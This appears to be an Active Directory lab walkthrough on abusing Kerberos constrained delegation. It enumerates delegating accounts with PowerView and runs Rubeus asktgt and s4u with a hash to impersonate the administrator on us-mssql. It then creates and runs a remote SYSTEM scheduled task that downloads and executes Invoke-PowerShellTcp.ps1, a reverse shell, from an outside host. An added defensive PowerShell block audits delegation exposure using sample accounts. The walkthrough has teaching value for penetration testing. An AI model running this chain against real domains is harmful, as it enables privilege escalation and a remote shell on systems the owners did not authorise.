Enumerating Constrained Delegation Using PowerView
Get-DomainUser -TrustedToAuth

We read the output this way: if we compromise the user appsvc, we can access the CIFS service on us-mssql as any user, including the Domain Admin.
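
The same attributes read from the defender's side, as an added example that is not part of the original page: it reports which hosts each delegating account exposes and which privileged accounts are missing the "sensitive and cannot be delegated" flag. The account records are constructed sample data (websvc and da-tier0 are hypothetical names), and the function names are assumptions of this example.

```powershell
$TRUSTED_TO_AUTH = 0x1000000   # TRUSTED_TO_AUTH_FOR_DELEGATION: protocol transition allowed
$NOT_DELEGATED   = 0x100000    # NOT_DELEGATED: "Account is sensitive and cannot be delegated"

function Get-DelegationExposure {
    # Input: objects with samAccountName, userAccountControl, msDS-AllowedToDelegateTo
    param([Parameter(ValueFromPipeline)] $Account)
    process {
        $spns = @($Account.'msDS-AllowedToDelegateTo' | Where-Object { $_ })
        if ($spns.Count -eq 0) { return }
        # The service class (CIFS, HOST, ...) does not confine the exposure, so report
        # the hosts: every service running under the same account on them is in scope.
        $hosts = $spns |
            ForEach-Object { (($_ -split '/')[1] -replace ':\d+$', '').ToLower() } |
            Sort-Object -Unique
        [pscustomobject]@{
            Account            = $Account.samAccountName
            ProtocolTransition = [bool]($Account.userAccountControl -band $TRUSTED_TO_AUTH)
            ExposedHosts       = @($hosts)
        }
    }
}

function Test-Delegatable {
    # True when the account can be impersonated through delegation.
    # Protected Users membership also blocks delegation and is not checked here.
    param($Account)
    -not ($Account.userAccountControl -band $NOT_DELEGATED)
}

# Constructed records shaped like Get-ADObject output. On a domain-joined host use:
#   Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
#       -Properties samAccountName,userAccountControl,msDS-AllowedToDelegateTo
$delegating = @(
    [pscustomobject]@{ samAccountName = 'appsvc'; userAccountControl = 0x1000200
        'msDS-AllowedToDelegateTo' = @('CIFS/us-mssql.us.techcorp.local', 'CIFS/us-mssql') }
    [pscustomobject]@{ samAccountName = 'websvc'; userAccountControl = 0x200
        'msDS-AllowedToDelegateTo' = @() }
)
$privileged = @(
    [pscustomobject]@{ samAccountName = 'administrator'; userAccountControl = 0x200 }
    [pscustomobject]@{ samAccountName = 'da-tier0';      userAccountControl = 0x100200 }
)

$delegating | Get-DelegationExposure | Format-List
$privileged | Where-Object { Test-Delegatable $_ } |
    ForEach-Object { "Can be impersonated via delegation: $($_.samAccountName)" }
```
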
Now let’s request a TGT as the appsvc user and import it into the current session
.\Rubeus.exe asktgt /user:appsvc /domain:us.techcorp.local /aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335 /ptt

Now let’s list the cached tickets to validate that the TGT was imported
klist

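Now let’s abuse the constrained delegation. The /altservice:host option changes the service class in the returned ticket from CIFS to HOST, which the scheduled task commands need.
.\Rubeus.exe s4u /user:appsvc /aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335 /impersonateuser:administrator /msdsspn:CIFS/us-mssql.us.techcorp.local /altservice:host /nowrap /ptt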

Now let’s create a scheduled task
schtasks /create /S us-mssql.us.techcorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(iwr http://192.168.100.36/Invoke-PowerShellTcp.ps1 -UseBasicParsing)'"

Now let’s run the scheduled task
schtasks /Run /S us-mssql.us.techcorp.local /TN "STCheck"